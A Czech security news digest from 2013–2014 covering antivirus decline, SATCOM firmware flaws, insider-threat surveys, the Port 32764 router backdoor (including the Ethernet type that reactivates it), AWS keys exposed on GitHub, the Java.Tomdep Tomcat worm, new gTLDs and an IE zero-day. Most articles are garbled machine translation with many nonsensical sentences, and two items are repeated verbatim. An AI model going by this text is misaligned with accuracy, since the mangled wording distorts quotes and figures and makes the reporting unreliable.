Funkce blokování sledování se přitom v prohlížečích postupně rozšiřuje. Například ve Firefoxu, kde si musí uživatelé DNT aktivně zapnout, si již tuto funkci aktivovalo 11 procent uživatelů. Microsoft dokonce ve svém Internet Eploreru od verze 10 má tuto funkci standardně zapnutou a uživatel si ji musí aktivně vypnout, pokud ji nechce používat.
Názor: Antivirový software odchází do důchodu
18.5.2014 Hrozby Antivirové programy se pomalu stávají přežitkem minulosti a přiznávají to i jejich výrobci.
Viceprezident Symantecu Brian Dye říká, že v současnosti tento software dovede rozpoznat a zachytit pouze 45 % malwarových útoků. Antivirový software je podle něj mrtvý. A já s ním souhlasím.
Podle Dye antivirové programy nechávají uživatele, kteří se cítí chráněni, na pospas kyberzločincům a hrozbám. Útočníci často využívají chyb v antivirových programech a stále přicházejí s novými způsoby, jak je obejít. Malware je čím dál tím komplexnější a jeho rozsah se pohybuje od těch nejjednodušších zločineckých útoků, které cílí například na informace o platebních kartách, až po sofistikované špionské programy, jež lze jednoduše proměnit v kyberzbraň, říká Eugene Kaspersky, zakladatel společnosti Kaspersky Lab.
Symantec, stejně jako ostatní společnosti zabývající se ochranou počítačů před útočníky, kvůli neúspěchům s detekováním problémů pomalu mění svou produktovou strategii. Místo toho, aby se soustředil pouze na jednoduchou ochranu před malwarem, chce se spíše věnovat rozpoznání problémů a na jejich následné řešení. To znamená, že bude sledovat úniky dat a další problémy a bude se snažit zabránit jejich následnému zneužití. Pro uživatele to bude v případě problémů znamenat změnu hesla, firmy však budou v takovém případě muset pozastavit přístup ke všem účtům a službám, které se staly předmětem útoku.
V tomto odvětví však Symantec za svou konkurencí stále pokulhává, 40 % jeho zisku stále pochází z klasických antivirových programů.
Na mém počítači se antivirus za dobu jeho existence párkrát objevil. Občas jsem to zkrátka vnímala jako jediné řešení jakéhosi aktuálního problému (způsobeného čistě mou nepozorností), jenže vždy mi v důsledku více problémů způsobil, než jich opravil. A tak mi do počítače stejně nesmí, já si dávám pozor a mám po problémech. Ač to samozřejmě v žádném případě nemůže být řešením pro velké společnosti, zaměstnávající všechny druhy uživatelů...
Neutěšený stav SATCOM bezpečnosti 28.4.2014 Hrozby Satelitní komunikace (SATCOM) hrají důležitou roli v globální telekomunikační systém, ale bezpečnost zařízení používaných odejde hodně být požadovaný, říká Ruben Santamarta, hlavní bezpečnostní poradce s IOActive.
Seznam bezpečnostních slabin on a jeho kolegové zjistili při analýze a reverzní inženýrství firmware používaný na nejrozšířenější Inmarsat a Iridium SATCOM terminály nezahrnuje pouze chyby v návrhu, ale také v zařízeních se, že by mohly být užitečné pro útočníky. "Žijeme ve světě, kde stále rostoucí proud digitálních dat se protékají mezi kontinenty. Je jasné, že ti, kteří kontrolují komunikační provoz mají horní ruky," upozornil Santamarta v nedávno zveřejněném článku věnovaném dokumentující jejich výzkumu. "Schopnost narušit, kontrolovat, upravovat, nebo re-trasy provoz poskytuje neocenitelnou příležitost provést vykonávat dohled nebo provádět kybernetickým útokům." Mnoho důležitých odvětví závisí na družicových sítí, včetně námořní a letecký průmysl, záchranné služby, energie a vojenského sektoru a médií. Vědci IOActive se soustředili na analýzu se svorkami na pozemní části infrastruktury SATCOM. "Náš výzkum nebyla určena zdůraznit software hledání společného memory korupce, ale spíše pochopit přirozené silné a slabé stránky Zabezpečení zařízení", "řekl poukázal na to, a bohužel, nedostatky oplývají. "The zranitelnosti odhalili jsme, co se zdá být více backdoor, napevno pověření, nelegální a / nebo nezabezpečené protokoly, a slabé šifrovací algoritmy. Tyto chyby zabezpečení umožňují vzdálené, neověřené útočníkům ohrozit dotčené výrobky . V některých případech je nutná interakce uživatele, aby tuto chybu zabezpečení zneužít, posílání jednoduché SMS nebo odeslat speciálně vytvořenou zprávu z jedné lodi na jinou loď by být úspěšný pro některé systémy SATCOM, "sdílené Santamarta. Technické detaily, které by umožnily útočníkům využít zjištěných zranitelností se, samozřejmě, není dosud široce sdíleny. Společnost pracuje s vládní CERT Coordination Center a zranitelných prodejců je opravit před tím, než tyto údaje zveřejnit. Mezitím, které doporučuje výrobce SatCom a prodejcům, aby odstranily všechny veřejně přístupné kopie aktualizace firmware zařízení z jejich webových stránek, takže that útočníci mohou 't si je stáhnout zdarma a čistit je na využitelné zranitelnosti. Přes to všechno, výše uvedené whitepaper je velmi zajímavé čtení, protože detaily řadu možných scénářů útoku.
Firmy se trochu akce ke zmírnění zasvěcených ohrožení 27.4.2014 Hrozby Zatímco podniky jsou stále více vědomi zasvěcených hrozby, že stále chybí vymahatelná kontroly zastavit a potrestat pachatele. LogRhythm přehled 1000 IT odborníků zjistila, že více než třetina (36 procent), IT profesionálů věří, zaměstnanci by přístup nebo krást důvěrné informace, ale 38 procent nemají, nebo víte o, případných systémech, které mají zastavit zaměstnancům přístup k neoprávněnému údaje .
Překvapivě, méně než polovina (48 procent), pravidelně měnit hesla k zastavení bývalým zaměstnancům získat přístup a nejčastěji používané odstrašení je hrozba zahájení disciplinárního řízení (64 procent). Nicméně, v odpovídajícím průzkumu 200 zaměstnanců, téměř polovina (47 procent) přiznala, že přístup, nebo vzít důvěrné informace z pracoviště, se 41 procent pomocí hesla a uživatelská jména pro přístup k datům poté, co opustil společnost. Zejména těch, kteří byli chyceni, čtvrtina neřekl nic nestalo, zatímco 67 procent se mluvilo, ale byla přijata žádná disciplinární opatření. Ještě více znepokojující je skutečnost, že 79 procent tvrdil, že nikdy nebyly identifikovány jejich nelegitimní akce. "I když je jasné, že riziko nepoctivých zasvěcenci se razí svou cestu až na firemní agendy, co to není jasné, je to, jak jsou organizace zabývající se hanebné činnosti zaměstnanců," řekl Ross Brewer, viceprezident a generální ředitel pro mezinárodní trhy v LogRhythm. "Ve LogRhythm je 2013 výzkum, jen 19 procent věřili, zaměstnanci by se krást data, čísla, která se téměř zdvojnásobil v loňském roce, což znamená, že podniky se pomalu probouzí k reality. Jaká je matoucí je, že navzdory tomu, že většina organizací se dosud uvedení odpovídající systémy. Ve skutečnosti, to není jen ohromující, že tak velký počet zaměstnanců nebyly nikdy chycen přístup k důvěrným údajům, ale že ti, kteří byly často dostal pryč s ním scot zdarma, "dodal Brewer. "Co můžeme vzít z toho je, že většina organizací stále mají jen velmi malou představu o tom, co se děje v rámci svých sítí," pokračuje Brewer. "I když se tváří v tvář s denními zprávami vnitřních bezpečnostních hrozeb, jako je nedávné Target porušení, jakož i vládní iniciativy na zvýšení informovanosti, podniky jsou stále sklon přimhouřit oko. V době, kdy hrozeb je tak obrovský a následky jsou tak velké, to je prostě neodpustitelné. " Zatímco více IT profesionálové citovat zasvěcených hrozbu jako větší bezpečnostní riziko (31 procent) než vnějšími hrozbami (29 procent), obecné shoda se zdá být to, že není dostatek význam je kladen na, které ji obsahují, se 37 procent pocitem, jako je jejich podnikání by mohl udělat více pro ochranu informací od zaměstnanců. Vzhledem k tomu, že třetina má také tušení, zda nebo ne oni utrpěli porušení dříve, Objeví tam je ještě dlouhá cesta. "Je ohromující, že třetina IT profesionálů nemůže říci, zda jejich organizace se někdy trpěl porušení - určitě to poznání by mělo být minimum? Aniž by věděl, co se stalo včera, podniky mají malou naději na ochranu jejich sítí dnes, "pokračoval Brewer." Podniky zřetelně potřeba zvýšit úroveň viditelnosti, které mají do svých sítí, aby bylo možné zahlédnout jakékoliv pochybné aktivity. Sledováním každou událost, ke které dochází v rámci IT infrastruktury - a to jak z interních a externích zdrojů - a definování "normálního" chování pro uživatele a systémy, budou organizace moci identifikovat a napravovat jakékoli porušení, jakmile k nim dojde. Pouze tím, že získá tuto in-hluboké znalosti a posílení kontroly přístupu strategie, budou podniky moci skutečně bránit.
52% podniků bezbranný proti kybernetickým útokům 25.4.2014 Hrozby 55% IT a bezpečnostních profesionálů mají buď nulové nebo nízké viditelnosti chování zaměstnanců, přístup k aplikacím a softwaru ke stažení, které se snaží zajistit koncový bod. Kromě nízké dohlednosti, studie Ponemon Institute a Avecto odhalila nadměrné uživatelé energie jsou uvedeny na IT infrastruktury. V průměru 31% zaměstnanců údajně mít oprávnění správce, otevření společnosti až zasvěcených hrozby a vážného poškození před malwarem a cílených útoků. Uživatelé jsou také volat záběry, pokud jde o bezpečnost, se 42% respondentů odhalil, že počet zaměstnanců s admin oprávněním zvýšil z loňského roku kvůli rostoucí poptávce ze strany zaměstnanců a 50% dává administrátorská práva, protože jsou schopni kontrolovat používání aplikací. Téměř čtvrtina respondentů nelze určit počet IT uživatelů s admin oprávněním, přes 34% z celkové bezpečnostní čas vynakládány na správu uživatelských profilů. Výsledky zobrazují IT oddělení bez adekvátní síly a kontroly nad svým uživatelům s více než 80% připouští, že je obtížné zajistit koncový bod a jen 5% prohlašovat, že je připraven jednat s cílenou cyber- útoky. Paul Kenyon, viceprezident pro Avecto řekl: "Nedostatečné zviditelnění, že bezpečnost IT profesionálové mají, pokud jde o chování uživatelů a administrátorských práv, v kombinaci s sofistikovanější vektorů útoku, dělá zabezpečení a správu koncového bodu rostoucí problém. Jako výsledek, to se otevírá obrovskou škálu vnitřních a vnějších zranitelnosti. " "Jak podniky přejít na Windows 7/8 v návaznosti na vypršení podpory XP, které hledají nové výzvy ve způsobu, jakým se dříve podařilo zabezpečení koncových bodů. To je nyní více než kdy jindy důležité, aby organizace investovat do bezpečnostních opatření, které potřebují, aby se ochránili. " rozsáhlé studie se zaměřila na řadu bezpečnostních hrozeb koncových bodů, a ukázalo se, že prevence APTS je největší zájem, ale 52% organizací . nemají správnou technologii na místě, aby se zabránilo cílených kybernetických útoků Dr. Larry Ponemon, předseda a zakladatel Ponemon Institute říká: "Zatímco prevence cílené útoky, je považováno za vysokou prioritu, pouze 5% respondentů uvedlo, že jejich organizace je plně připraveni se s nimi vypořádat. Organizace musí zavést vrstvený přístup k zabezpečení koncových bodů, nebo budou riskovat otevření své systémy až zranitelnosti z více zdrojů hrozeb. Nový věk kybernetických útoků vyžaduje moderní obranné a společnosti musí jednat rychle. "
Port 32764 Router Backdoor je zpět (nebo to bylo někdy šel?) 23.4.2014 Hrozby
Na rozdíl od oznámil před několika měsíci, neslavný "Port 32764" backdoor nebyl plně záplatované v nových směrovačů [1]. Jako připomenutí, původní backdoored povolen neomezený / neověřený kořenový přístup k routeru připojíte k portu 32764. Backdoor byl vystopován k součástek vyrábí podle Sercomm. Sercomm dodává díly pro řadu značkových routerů prodávaných pod značkami Cisco, Linksys, Netgear, Diamond a možná i jiné.
Analýza z aktualizace routeru Synacktive bylo zjištěno, že kód se provádí na zadní dveře, je stále přítomen, a může být aktivován pro poslech opět zasláním konkrétní Ethernet paket. Paket by neměl být veden tak, útočník musí mít přístup k místní síti router je připojen, což výrazně snižuje pravděpodobnost využití, ale neodstraňuje ji.
Paket aktivaci backdoor je identifikován typu Ethernet o 0x8888.
Povědomí SCADA rizika, hrozby a porušení 14.4.2014 Hrozby SANS oznámila výsledky svého průzkumu 2014 o zabezpečení řídicího systému, ve kterém 268 IT odborníci odpovídali na otázky týkající se jejich celkové povědomí o rizicích, trendy v ohrožení a porušení, a účinný prostředek ke zmírnění zranitelnosti s ohledem na SCADA / ICS. "Útoky na řídicích systémů jsou na vzestupu, "říká Matt Luallen, SANS analytik a autor tohoto průzkumu. "Rozpočty pro kybernetické bezpečnosti v prostředí SCADA ICS nadále velmi tenký a organizace jsou i nadále závislé na omezených zdrojích a personálu k zjišťování narušení a útoků." v roce od Sans 'posledního průzkumu na toto téma, počet subjektů s nebo podezření narušení bezpečnosti se zvýšil z 28% na téměř 40%. Pouze 9% lze říci s jistotou, že nebyla porušena. organizace chtějí, aby mohli chránit své systémy a aktiva, které obsahují počítačové systémy, sítě, vložené řadiče, komunikační systém kontroly protokolů a různých hmotných aktiv. Respondenti rovněž poznamenat, že se snaží chránit veřejnou bezpečnost; zvýšit povědomí o rizicích vedení; a rozšířit kontroly vztahující se k identifikaci, komunikační kanály a centralizovaného monitorování. Přesto, mnoho organizací nemají nebo nemohou shromažďovat údaje od některých z nejdůležitějších SCADA a ICS majetku, a mnoho závisí na vyškolený personál, ne nástroje, odhalit problémy. Je alarmující, podle průzkumu, 16% nemá žádný proces, v místě odhalit slabá místa. Zajímavé je, že průzkum zaznamenal sloučení bezpečnosti ICS a IT bezpečnosti. "Respondenti, že bezpečnost ICS je provedeno odborníky hlášení jak inženýrství a IT," říká Derek Harfa, obchodní operace vedou k ICS programů na SANS. "To klade skutečný důraz na cross-oddělení koordinace, efektivní přemostění kompetencí a budování (stejně jako hodnocení) dovednosti v organizovaným způsobem."
10000 uživatelé GitHub nechtěně odhalí své AWS tajné přístupové klíče 6.4.2014 Hrozby GitHub vývojáři, kteří jsou také uživatelé Amazon Web Services se doporučuje zkontrolovat kód, které zveřejněn na svých stránkách projektu a odstranit tajné klíče pro přístup k jejich účtu AWS mohou zaslali neúmyslně.
"Při přístupu AWS programově, můžete ověřit svou identitu a identitu svých aplikací pomocí přístupového klíče. Přístupový klíč se skládá z přístupového klíče ID (něco jako AKIAIOSFODNN7EXAMPLE) a tajný přístupový klíč je (něco jako wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY ), "je to vysvětleno v AWS "Best Practices pro správu AWS Klávesové zkratky dokument. "Každý, kdo má svůj přístupový klíč má stejnou úroveň přístupu k vašim zdrojům AWS, které děláte. Proto jdeme do významných délek chránit své přístupové klíče , a v souladu s naším modelem sdílené odpovědnosti, měli byste stejně. " Ale někteří uživatelé byli laxní, pokud jde o ochranu jejich klíče. "Viděli jsme pár případů, kdy zákazníci odeslali omylem svá přístupová kořenového klíče k veřejnému kódu repozitáře, proto doporučujeme minimalizovat svou plochu bezpečnostní odstraněním (nebo ne), vytvoření přístupových kořenové klíče dohromady, "které je uvedeno v nedávném blogu. Klávesy jsou snadno zjistitelné pomocí jednoduchého GitHub vyhledávání a, v závislosti na Ty Miller, zakladatel penetrační testování firma Threat Intelligence, téměř 10.000 z nich lze v současné době nalézt na populární hostingové služby pro softwarových projektů. Když vysvětlil IT News Austrálie, udělal vyhledávání a testován jeden z objevených klíče, aby zjistili, zda má přístup účet AWS a nepořádek s ním. A udělal - on nahrál a poté se termín smaže soubor z účtu. On říká, že to mohl udělat mnohem horší. "Pokud se jedná o vývojáři, kteří vytvářejí aplikace pro podniky a korporace AWS klíče unikly - byste mohli jít a odstranit celý svůj životní prostředí," podotkl. generální ředitel Securosis Rich Mogull byl jedním z lidí, kteří, přes naprostý chybí- smýšlení, zapomněl odstranit jeho AWS tajný klíč od kódu se zveřejněné na GitHub. A útočník ho objevil a používal to, aby běžet až 500 dolarů poplatků. Podobný problém byl označen na začátku tohoto roku, kdy GitHub nový vyhledávač odhalila hesla a soukromé šifrovací klíče, které neopatrný vývojáři zapomněli odstranit z jejich kódu. Ke zmírnění chyby, jako jsou tyto, GitHub vytvořila a pravidelně aktualizuje uživatelskou příručku pro důkladně odstranění citlivých dat z jejich git repozitáře. Mezitím, AWS se doporučuje , aby uživatelé vytvořit uživatele AWS správa identit a přístupu (IAM) s přístupovými klíči namísto vytvoření klávesové zkratky pro jejich Účet root.
Cyber podvodníci půjde po lékařských záznamů další 9.3.2014 Hrozby Jako bezpečnostní firmy a orgány činné v trestním řízení nadále spolupracovat a úspěšně sundat botnety, bude počítačoví podvodníci budou nuceni hledat nové a lukrativní cílů, a to zejména ty, které jsou špatně zajištěné.
V panelu se konala na konferenci RSA která se konala minulý týden v San Franciscu, tým Microsoft / Agari za Citadely botnet takedown řekl, že tyto nové cíle bude pravděpodobně ve zdravotnictví. Poté vysvětluje , jak šli kolem provádějící takedown, ale vysvětlil důvod své přesvědčení, že zdravotní systémy IT a nemocniční databáze jsou další v řadě k porušení dat. generální ředitel Agari Patrick Peterson sdíleny, že cena lékařských záznamů, které patří do jedné osobě by mohlo přinést asi 60 dolarů, zatímco jeden záznam kreditní kartou se vyplatí pár dolarů v podzemních trzích. On také poukázal na to, že mezi odvětví tak daleko, finančních organizací a sociálních sítí zaměřených tvrdě pracovali na ochranu svých zákazníků, a dělali pokusy počítačoví zločinci "složitější, a proto dražší. Na Na druhé straně, většina zdravotnického průmyslu není následovali. Navíc k tomu všemu, lékařské záznamy, aby podvodníci velmi cenné informace o cíli, které mohou být zneužity k montáži účinných útoků sociálního inženýrství, poznamenal Richard Boscovich, asistentka generální rada s Microsoft Digital Zločiny jednotka. Dalo by se věřit, že informace, jako je ta obsažená v lékařských záznamů by mohlo být, že užitečné, ale v rukou kvalifikovaných sociálních inženýrů se může obrátit na zlato. "Tihle kluci jsou dobří, jsme viděli, že se stalo," komentoval Boscovich.
E-mail objev ekosystém a prevence cyberthreat 8.3.2014 Hrozby | Bezpečnost Agari oznámil Agari PRO, postavený na společnosti cloud-based SaaS datové platformy, která pomáhá společnostem zjistit, přijmout opatření, a zabránit pokročilé e-mailové hrozbách, které jsou zaměřené na koncové uživatele dnes.
Agari PRO je řešení ochrany e-mailu kanál, který poskytuje globální značky se e-mail ekosystému objev, odhalení cyberthreat a prevence, hrozby a monitorování infrastruktury a varování, a nabízí žalovatelné sanace pracovní postupy pro prevenci hrozeb. Postavený na své síti detekce v reálném čase, Agari PRO zákazníci získat okamžitý a bezprecedentní viditelnost do všech e-vysílajících domén, které jsou ve vlastnictví, oprávněnou třetí stranu, nebo škodlivé. síť Agari v real-time detekce je povoleno DMARC, s bezpečnostní normou e-mail, že je vidět rychlé přijetí, s podporou 85% schránek v USA a 60% schránek po celém světě. . DMARC umožňuje značek být pod kontrolou jejich e-mailové kanálu a definitivně sdělit přijímačů, které e-mailu je od nich a který e-mail není Klíčové vlastnosti Agari PRO zahrnují:
Detekce útoku a vizualizace: detekce v reálném čase a inteligence na hrozbách, včetně podezřelé URL a IP adres, umožňujících bezpečnostní týmy, aby přijaly okamžitá opatření Proaktivní sanace workflow: Agari je veden workflow nabízí jasné kroky, jak vyřešit bezpečnostní problémy, nástroje a pracovní postupy pro zavádění a sledování e-mailovou ověřování v rámci infrastruktury klienta Prevence hrozeb: S plným nasazením, e-mail hrozbách jsou zakázány, a data jsou sdílena pokusů a zmařených útoků ISP poskytnout úplný přehled "S poslední titulky představí, že e-mail je zřejmé, že cybercriminal oblíbený cíl útoku, by mohla naše řešení nemůže být více relevantní," řekl Patrick Peterson, CEO a zakladatel společnosti Agari. "Převedením na světě e-mailových schránek do sítě detekce v reálném čase, vidíme hrozby okamžitě a sdílet data jsme analyzující - 4500000000 zpráv denně -. umožnit okamžitou akci a prevence hrozeb.
Cyber podvodníci půjde po lékařských záznamů další 9.3.2014 Hrozby Jako bezpečnostní firmy a orgány činné v trestním řízení nadále spolupracovat a úspěšně sundat botnety, bude počítačoví podvodníci budou nuceni hledat nové a lukrativní cílů, a to zejména ty, které jsou špatně zajištěné.
V panelu se konala na konferenci RSA která se konala minulý týden v San Franciscu, tým Microsoft / Agari za Citadely botnet takedown řekl, že tyto nové cíle bude pravděpodobně ve zdravotnictví. Poté vysvětluje , jak šli kolem provádějící takedown, ale vysvětlil důvod své přesvědčení, že zdravotní systémy IT a nemocniční databáze jsou další v řadě k porušení dat. generální ředitel Agari Patrick Peterson sdíleny, že cena lékařských záznamů, které patří do jedné osobě by mohlo přinést asi 60 dolarů, zatímco jeden záznam kreditní kartou se vyplatí pár dolarů v podzemních trzích. On také poukázal na to, že mezi odvětví tak daleko, finančních organizací a sociálních sítí zaměřených tvrdě pracovali na ochranu svých zákazníků, a dělali pokusy počítačoví zločinci "složitější, a proto dražší. Na Na druhé straně, většina zdravotnického průmyslu není následovali. Navíc k tomu všemu, lékařské záznamy, aby podvodníci velmi cenné informace o cíli, které mohou být zneužity k montáži účinných útoků sociálního inženýrství, poznamenal Richard Boscovich, asistentka generální rada s Microsoft Digital Zločiny jednotka. Dalo by se věřit, že informace, jako je ta obsažená v lékařských záznamů by mohlo být, že užitečné, ale v rukou kvalifikovaných sociálních inženýrů se může obrátit na zlato. "Tihle kluci jsou dobří, jsme viděli, že se stalo," komentoval Boscovich.
E-mail objev ekosystém a prevence cyberthreat 8.3.2014 Hrozby | Bezpečnost Agari oznámil Agari PRO, postavený na společnosti cloud-based SaaS datové platformy, která pomáhá společnostem zjistit, přijmout opatření, a zabránit pokročilé e-mailové hrozbách, které jsou zaměřené na koncové uživatele dnes.
Agari PRO je řešení ochrany e-mailu kanál, který poskytuje globální značky se e-mail ekosystému objev, odhalení cyberthreat a prevence, hrozby a monitorování infrastruktury a varování, a nabízí žalovatelné sanace pracovní postupy pro prevenci hrozeb. Postavený na své síti detekce v reálném čase, Agari PRO zákazníci získat okamžitý a bezprecedentní viditelnost do všech e-vysílajících domén, které jsou ve vlastnictví, oprávněnou třetí stranu, nebo škodlivé. síť Agari v real-time detekce je povoleno DMARC, s bezpečnostní normou e-mail, že je vidět rychlé přijetí, s podporou 85% schránek v USA a 60% schránek po celém světě. . DMARC umožňuje značek být pod kontrolou jejich e-mailové kanálu a definitivně sdělit přijímačů, které e-mailu je od nich a který e-mail není Klíčové vlastnosti Agari PRO zahrnují:
Detekce útoku a vizualizace: detekce v reálném čase a inteligence na hrozbách, včetně podezřelé URL a IP adres, umožňujících bezpečnostní týmy, aby přijaly okamžitá opatření Proaktivní sanace workflow: Agari je veden workflow nabízí jasné kroky, jak vyřešit bezpečnostní problémy, nástroje a pracovní postupy pro zavádění a sledování e-mailovou ověřování v rámci infrastruktury klienta Prevence hrozeb: S plným nasazením, e-mail hrozbách jsou zakázány, a data jsou sdílena pokusů a zmařených útoků ISP poskytnout úplný přehled "S poslední titulky představí, že e-mail je zřejmé, že cybercriminal oblíbený cíl útoku, by mohla naše řešení nemůže být více relevantní," řekl Patrick Peterson, CEO a zakladatel společnosti Agari. "Převedením na světě e-mailových schránek do sítě detekce v reálném čase, vidíme hrozby okamžitě a sdílet data jsme analyzující - 4500000000 zpráv denně -. umožnit okamžitou akci a prevence hrozeb.
Všechny Vaše Tomcat Jsou Patří do padouchy?
22.11.2013 Hrozby
Symantec objevil nový zadní dveře Šnekové hrozbu, která se zaměřuje serverů s Apache Tomcat. Tato hrozba je trochu odlišné od těch se obvykle setkáváme každý den.
Zpět typu dveří trojské koně a červy ať útočníci spouštět různé příkazy v napadených počítačích a v podstatě umožňuje útočníkovi ovládat počítač na dálku. To znamená, že důležité informace mohou být ukradené od uživatele a jejich počítače by mohly být použity k útoku na další oběti.
Můžete si myslet, že tento typ útoku se týká pouze osobních počítačů, jako jsou stolní počítače a notebooky, ale bohužel to není pravda. Servery mohou být také napaden. Jsou velmi cenné cíle, protože jsou obvykle vysoce výkonné počítače a spustit v režimu 24x7. Často vidíme zadní dveře typu trojských koní, které jsou napsané v PHP, jako je PHP.Backdoor.Trojan. Tentokrát však, Symantec našel zadní dveře červa, který se chová jako Java Servlet. Jsme pojmenovali Java.Tomdep .
Obrázek 1. Jak Java.Tomdep šíří
Java Servlet se provádí na Apache Tomcat, ale to není vytvořit webovou stránku a místo toho se chová jako IRC bot. Připojuje se k IRC serveru a provádí příkazy odeslané od útočníka. Koncoví uživatelé, kteří navštíví webové stránky z ohrožení Tomcat serveru nejsou touto hrozbou. Kromě standardních příkazů, například stahovat, přesouvat, vytvářet nový proces, SOCKS proxy server, UDP záplavy, a aktualizuje sám; napadené počítače můžete také skenovat z jiných serverů Tomcat a poslat malware k nim. Je tedy možné, že DDoS útoky z napadených serverů je cílem útočníka.
Když zjistí, že jiný server Tomcat, je nejprve pokusí přihlásit pomocí následujících dvojic slabých uživatelská jména a hesla:
Obrázek 2. Uživatelská jména a hesla používaná při pokusech o přihlášení pomocí Java.Tomdep
Pak se nasadí se na nalezené Tomcat serveru:
Obrázek 3. Java.Tomdep nasadí do nalezeno Tomcat serveru
Víme, že velení a řízení (C & C) servery útočník se nacházejí v Tchaj-wanu a Lucembursku. Máme infekce zprávy od zákazníků, v omezeném počtu zemí.
Obrázek 4. zpráva Infekce místech
Pokud je nám známo, není mnoho počítačů staly obětí této hrozbě ještě. Nicméně, v některých případech, serverové počítače nemají antivirové nainstalován na ně stejným způsobem, že osobní počítače by. Doufejme, že to není důvodem pro nízké rychlosti detekce.
Aby se zabránilo tomuto nebezpečí, zajistí, že vaše výrobky serveru a AV jsou plně záplatované a aktualizovány. Doporučujeme používat silná hesla a neotvírejte port pro správu přístupu veřejnosti.
Symantec produkty detekovat tuto hrozbu jako Java.Tomdep a Java.Tomdep Gen1! .
Jsou nové gTLD hrozbou pro vaše síť?
21.11.2013 Hrozby
23. října Internetové sdružení pro přidělování jmen a čísel (ICANN), oznámila, že roll-out prvních 4 gTLD v rámci svého nového programu gTLD . Nové domény by mohly představovat potenciální bezpečnostní hrozbu pro vaši organizaci.
gTLD je zkratka pro Generic Top Level Domain, jedná se o široce používané domény, které jsou otevřené pro každého, kdo se chce zapsat jeden jako. com,. net a. org. gTLD domény jsou odlišné od Country Code Top Level Domains (ccTLD), jako. nám,. Velké Británii, a. nz v tomto ccTLD často mají některá omezení v místě, o tom, kdo může registrovat doménu a jsou udržovány v jednotlivých země Network Informatin Center (NIC) - i když tento úkol je často externě.
Před vyhlášením nové gTLD program zahajuje novou gTLD byl nákladný a pracný úkol, ve skutečnosti poslední sadu nových gTLDs valit ven (. Aero,. Jezdit. Pracovních míst) se do značné míry vnímána jako selhání. Se zahájením programu New gTLD ICANN očekává zvýšení počtu gTLDs z 14 na více než 2200.
Co to znamená pro vaši organizaci z hlediska bezpečnosti? To znamená, že je nyní širší bezpečnostní stopa, že budete muset sledovat. Někdo nakupování bot na jejich polední přestávky může jít www.amazon.com , www.shoes.amazon , nebo www.amazon.shoes a skončit na stejném místě, nebo jeden z těchto domén by mohlo být podvodné.
Zatímco tam je prověřování proces pro vytvoření gTLD a provoz je monitorován ICANN za prvních 30 dní po tom neexistují žádné bezpečnostní opatření na místě, ale každý nový gTLD zůstává část názvu kořenového serveru ekosystému.
Soukromá organizace, která dělá to přes schvalovací proces a projde testem 30 dnů je nyní schopen dělat, co chce s doménami pod jeho gTLD a má viditelnost na celém světě.
ICANN, a jiní, tout výhod Nové gTLD program , řekl: "V následujících týdnech a měsících, se dočkáme nových doménových jmen přichází on-line ze všech koutů světa, čímž lidí, komunit a podniků společně způsoby, které nikdy představoval. je to tento typ inovace, které budou i nadále řídit naše globální společnost. "
I když tohle všechno může být pravda, ale také má potenciál přidat do bezpečnostních bolesti hlavy svých organizací.
Kybernetické hrozby organizace se bude zabývat v roce 2014
14.11.2013 Hrozby | Bezpečnost
Hrozeb se neustále vyvíjí, a to podniku je úkolem a povinností držet krok se změnami a dělat to nejlepší, co mohou, aby uchránily své údaje, zaměstnance a sítí. Podle nedávno zveřejněné zprávy od Gruzie Bezpečnostní informační Tech Center na vznikající cyber hrozby, může být v organizacích 2014 očekávat, že zabývat se otázkou bezpečnosti vs použitelnosti, pokud jde o údaje, které uložit v oblaku, nejisté připojených zařízení, zvyšující se útoky na mobilní platformy a uživatelů, a problémy, pokud jde o manipulaci s informacemi . Problémy s daty uloženými v cloudu jsou rozmanité. Za prvé, v případě, že data jsou uložena nešifrovaná, organizace spoléhají na firmy cloud úložiště zajistit bezpečnost - a to často není dost. Na druhou stranu, pokud se soukromě šifrování dat, hodně z mraku užitnou zrušeny. Také, tam je problém zaměstnanců, kteří se snaží pracovat efektivněji pomocí - často proti oficiální firemní politiky - sdílení souborů a cloud služby s otázkou, bezpečnost. Konečně, co když počítače zaměstnanců, se napaden malware pro krádež dat? "Párování spolehlivost cloud úložiště se silným šifrováním lze vytvořit systém, který je zároveň bezpečný a spolehlivý i při použití veřejného internetu," výzkumníci poukazují, s tím, že jejich kolegové z Georgia Tech vytvořily "systém, který lze použít cloud úložiště online, a párování na bezpečné a samostatné virtuální stroje mohou například vytvořit vysoce bezpečný způsob přístupu k datům. " Tento "CloudCapsule" Projekt umožňuje uživatelům přepínat do bezpečného režimu pro přístup šifrovaných souborů uložených v cloudu, a jak to udělat pomocí stejné stanici se postará o zbytek své práce na. Podle nich, může být systém použit s jakýmkoliv cloud úložiště, ale stále nemůže očekávat, že údaje, aby byly přístupné, protože by se to bez šifrování. Vědci jsou v současné době pracujeme na tom, šifrování vyhledávat, ale také bezpečný (stejně jako to může být za těchto okolností). Pokud jde o "internetu věcí" - neustále se rozšiřující síť zařízení bezdrátově připojené k pokladně Domů nebo obchodní sítí , a prostřednictvím které se k Internetu - hlavní problém je, že jsou náchylné k útokům. Bezpečnost nebyla hlavní starost, když (jsou) nejprve se vyvíjel, a později "přišroubovány" bezpečnostních upgrade často nejsou prováděny z důvodu rizika "lámání" kritické systémy. Také, mnoho z těchto zařízení jsou dostatečně složité spustit bezpečnostní software, takže ji na síti sledování hladiny pro detekci kompromisy. Konečně je zde otázka zařízení dostat napaden škodlivým softwarem a back-doored během jedné z etap v zásobování řetěz. Mobile Security jasně zůstanou i nadále být problém pro podniky. S příchodem BYOD, nové hrozby, a stále častěji, jako je malware a útoky MITM. Gated app obchody, jako je Google Play a Apple App Store také ukázalo, že není být perfektní obrana, a možné negativní důsledky na sledování uživatelů prostřednictvím jejich mobilních zařízení se teprve začal být prozkoumány. Bezpečnostní náklady jsou vyšší než kdy jindy, jsou . pravděpodobně stane ještě vyšší, protože více vrstev statickou obranu modelu, honí technologií a koncentrace o ochraně údajů (a použitelnost) stala normou Konečně vydání dat a informační manipulace - ať už je to jeden potřeboval zprovoznit rozhodnutí, nebo ten, ovlivňující obchodní pověst - je také dostává do popředí, jak velké pokroky analýzy dat.
Útok na novou zranitelnost v IE probíhá z RAM
12.11.2013 Zranitelnosti | Hrozby Kyberzločinci využívají ke svým útokům nově objevenou zranitelnost v prohlížeči Internet Explorer, na niž zatím neexistuje žádná oprava. Malware je uložen jen v RAM, po restartu počítače tedy zmizí.
